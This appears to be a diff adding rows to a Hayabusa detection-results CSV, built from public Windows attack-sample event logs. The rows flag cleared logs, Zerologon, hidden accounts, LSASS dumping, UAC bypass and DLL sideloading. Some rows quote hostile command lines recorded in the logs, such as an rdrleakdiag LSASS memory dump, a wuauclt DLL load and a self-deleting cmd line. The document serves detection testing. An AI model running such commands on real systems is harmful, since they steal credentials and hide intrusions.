+2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx
+2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\inetsrv\w3wp.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
+2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
+2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49707  :  LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49707  :  LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $  :  SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $  :  SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation 02694W-WIN10  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: 02694W-WIN10  :  IP Address: 172.16.66.37  :  Port: 49959  :  LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6}  :  Path: C:\Windows\System32\dllhost.exe  :  User: 3B\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85}  :  Path: C:\Windows\System32\dllhost.exe  :  User: 3B\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: -  :  IP Address: 172.16.66.37  :  Port: 50106  :  LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616  :  Path: C:\Windows\System32\WerFault.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator  :  Workstation: -  :  IP Address: 172.16.66.37  :  Port: 50107  :  LogonID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload  :  Path: C:\Windows\System32\wermgr.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe  /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap  :  Path: C:\Windows\System32\rdrleakdiag.exe  :  User: DESKTOP-PIU87N6\wanwan  :  Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe  :  Path: C:\Users\Public\POC\bin\Debug\POC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program  :  Path: C:\Users\Public\POC\bin\Debug\POC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe  :  Path: C:\Windows\System32\Taskmgr.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: Akagi_64.exe  59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe  :  Path: C:\Windows\System32\Taskmgr.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: Akagi_64.exe  59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding  :  Path: C:\Windows\System32\smartscreen.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe""  :  Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe""   :  Path: C:\Users\Public\tools\apt\wwlib\test.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe""   :  Path: C:\Users\Public\tools\apt\wwlib\test.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart  :  Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe""  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe""  :  Path: C:\Windows\SysWOW64\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll""  :  Path: C:\Windows\SysWOW64\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
+2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe  :  URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe  :  URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe  :  Path: C:\Windows\SysWOW64\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx
